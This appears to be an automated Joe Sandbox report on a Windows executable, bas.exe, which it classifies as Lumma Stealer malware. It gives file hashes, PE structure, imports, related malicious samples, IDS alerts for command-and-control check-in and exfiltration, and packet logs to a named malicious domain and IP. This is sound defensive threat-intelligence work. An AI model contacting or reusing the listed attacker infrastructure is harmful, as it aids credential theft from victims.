                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctadxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgdxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://volcanohushe.click/apisdxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://support.mozilla.org/products/firefoxgro.alldxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://volcanohushe.click/apiedxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://volcanohushe.click/apifdxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.71.155 | volcanohushe.click | United States | 13335 | CLOUDFLARENET US | true
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1579571
                                                                                                      Start date and time:2024-12-23 01:21:09 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 4m 40s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:bas.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/0@1/1
                                                                                                      EGA Information:Failed
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target bas.exe, PID 7420 because there are no executed functions
• Execution Graph export aborted for target dxdiag.exe, PID 7524 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
19:22:09 | API Interceptor | 8x Sleep call for process: dxdiag.exe modified
                                                                                                      No context
                                                                                                      No context
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
tg.exe | malicious | Babadeda | 172.67.74.152
Launcher_x64.exe | malicious | LummaC | 172.67.157.254
tg.exe | malicious | Babadeda | 104.26.12.205
setup.exe | malicious | Babadeda | 104.26.13.205
AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 104.21.80.1
WonderHack.exe | malicious | LummaC | 104.21.66.86
installer.msi | malicious | Unknown | 172.67.164.25
external.exe | malicious | LummaC | 104.21.19.35
Loader.exe | malicious | RHADAMANTHYS | 172.64.41.3
Launcher.exe | malicious | LummaC | 104.21.66.86
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
Launcher_x64.exe | malicious | LummaC | 104.21.71.155
AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 104.21.71.155
WonderHack.exe | malicious | LummaC | 104.21.71.155
external.exe | malicious | LummaC | 104.21.71.155
Launcher.exe | malicious | LummaC | 104.21.71.155
Wave-Executor.exe | malicious | LummaC | 104.21.71.155
Setup.exe | malicious | LummaC | 104.21.71.155
Setup.exe | malicious | LummaC | 104.21.71.155
Full_Ver_Setup.exe | malicious | LummaC | 104.21.71.155
winwidgetshp.mp4.hta | malicious | LummaC | 104.21.71.155
                                                                                                      No context
                                                                                                      No created / dropped files found
                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Entropy (8bit):7.752878047119261
                                                                                                      TrID:
                                                                                                      • Win64 Executable GUI (202006/5) 91.80%
                                                                                                      • Win64 Executable (generic) (12005/4) 5.46%
                                                                                                      • Clipper DOS Executable (2020/12) 0.92%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.91%
                                                                                                      • DOS Executable Generic (2002/1) 0.91%
                                                                                                      File name:bas.exe
                                                                                                      File size:13'164'032 bytes
                                                                                                      MD5:d5139ae53cb10a64c9245bbf3447ed1c
                                                                                                      SHA1:727199337e080c162fd86558a697b3bcbce646e1
                                                                                                      SHA256:8ad2dcb075a7da5785530bc805b5391a397e1c659bedcb564774b6940b7fcbed
                                                                                                      SHA512:e0efdd485460975a43c6b472554df08cc3e3ea60bc7e71b7477909748ad5c0ba566fc70110ff87717f704ecc96688b13bd62b5fd116bc2719fd381ab3908bdc6
                                                                                                      SSDEEP:393216:+v4V9WRLAsEb6hCFcXLVsasjQsIyQ+/jn7:+v4TyA/bApXhOhQ+/7
                                                                                                      TLSH:AFD6D1298A7BC9C4F06BA030E89611338B32F51857ADE5F575970642CF9A0269FDF336
                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...7.hg.........."..........>......X:.........@.............................`............`........................................
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x140093a58
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x140000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x67680F37 [Sun Dec 22 13:08:07 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:7bb4e8cef6a9f350a8f5dc71e7b3773c
                                                                                                      dec eax
                                                                                                      xor eax, dword ptr [ebp+18h]
                                                                                                      dec eax
                                                                                                      xor eax, dword ptr [ebp-10h]
                                                                                                      dec eax
                                                                                                      xor eax, ecx
                                                                                                      dec eax
                                                                                                      mov ecx, FFFFFFFFh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaf0f10 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc48000 | 0x1b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xc40000 | 0x471c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc49000 | 0x4c018 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa0f6d0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa09bf0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xaf11d8 | 0x2a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa9a1a | 0xa9c00 | 9022bf955907d19443dc9c1c05937627 | False | 0.34132944817746685 | data | 6.128686871082244 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xab000 | 0xa4aacc | 0xa4ac00 | 730c728236536961e98542e16229e1bf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xaf6000 | 0x149770 | 0x147e00 | b6d04e54dcf0f82b4f7852477a367132 | False | 0.4186604972836447 | data | 4.676515858242816 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xc40000 | 0x471c | 0x4800 | 3852fea8a5c524d0c39a0c9b3652a982 | False | 0.5022786458333334 | data | 5.814729003118305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fptable | 0xc45000 | 0x100 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xc46000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0xc47000 | 0x280 | 0x400 | 3ea74578188a1448520b30c7c6f0ef06 | False | 0.2939453125 | data | 3.191461552490851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc48000 | 0x1b4 | 0x200 | c7ba142499c72176de5305b1e419cf29 | False | 0.48828125 | data | 5.103911525545503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc49000 | 0x4c018 | 0x4c200 | a74e9f499148060928f902cd4a09957d | False | 0.01549671592775041 | data | 5.432283010808474 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc48058 | 0x15b | ASCII text, with CRLF line terminators | English | United States | 0.5446685878962536
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualProtect, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T01:22:09.042301+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:09.919391+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:09.919391+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:11.200792+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:11.956641+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:11.956641+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:13.656018+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:16.080339+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:18.557909+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:21.368165+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:22.132533+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49712 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:23.820880+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49713 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:27.362380+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 104.21.71.155 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 01:22:07.786267996 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:07.786295891 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:07.786374092 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:07.813343048 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:07.813369989 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.042177916 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.042300940 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.045408010 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.045419931 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.045803070 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.097506046 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.169915915 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.169950962 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.170368910 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.919390917 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.919524908 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.919593096 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.952070951 CET | 49706 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.952091932 CET | 443 | 49706 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.987184048 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.987253904 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:09.987355947 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.987771034 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:09.987787008 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.200716972 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.200792074 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.202291012 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.202311039 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.202662945 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.203923941 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.203962088 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.204027891 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956080914 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956151962 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956202984 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956247091 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956288099 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956324100 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.956325054 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.956356049 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.956397057 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.964108944 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.975404978 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.975486040 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.975585938 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.975600004 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:11.975658894 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:11.983776093 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.034120083 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.075521946 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.127986908 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.128010035 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.151559114 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.151596069 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.151637077 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.151658058 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.151691914 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.151710033 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.151736975 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.152007103 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.152023077 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.152034044 CET | 49707 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.152041912 CET | 443 | 49707 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.443846941 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.443922997 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:12.443996906 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.444277048 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:12.444288969 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:13.655926943 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:13.656018019 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:13.685674906 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:13.685705900 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:13.686119080 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:13.687596083 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:13.687736988 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:13.687773943 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:14.647820950 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:14.647948980 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:14.648005009 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:14.648154974 CET | 49708 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:14.648170948 CET | 443 | 49708 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:14.868871927 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:14.868927002 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:14.868999958 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:14.869292974 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:14.869307995 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:16.080223083 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:16.080338955 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:16.165110111 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:16.165133953 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:16.165489912 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:16.166778088 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:16.167012930 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:16.167048931 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:16.167108059 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:16.211332083 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:17.094990969 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:17.095073938 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:17.095141888 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:17.095429897 CET | 49709 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:17.095451117 CET | 443 | 49709 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:17.342883110 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:17.342941999 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:17.343018055 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:17.343334913 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:17.343348980 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:18.557842016 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:18.557909012 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:18.559669971 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:18.559691906 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:18.559979916 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:18.561207056 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:18.561471939 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:18.561506033 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:18.561561108 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:18.561572075 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:19.779421091 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:19.779527903 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
Dec 23, 2024 01:22:19.779575109 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:19.779656887 CET | 49710 | 443 | 192.168.2.8 | 104.21.71.155
Dec 23, 2024 01:22:19.779670954 CET | 443 | 49710 | 104.21.71.155 | 192.168.2.8
                                                                                                      Dec 23, 2024 01:22:20.154040098 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:20.154103041 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:20.154181004 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:20.154495955 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:20.154515028 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:21.368055105 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:21.368165016 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:21.375226021 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:21.375257969 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:21.375581026 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:21.376799107 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:21.376871109 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:21.376883984 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:22.132544994 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:22.132642031 CET44349712104.21.71.155192.168.2.8
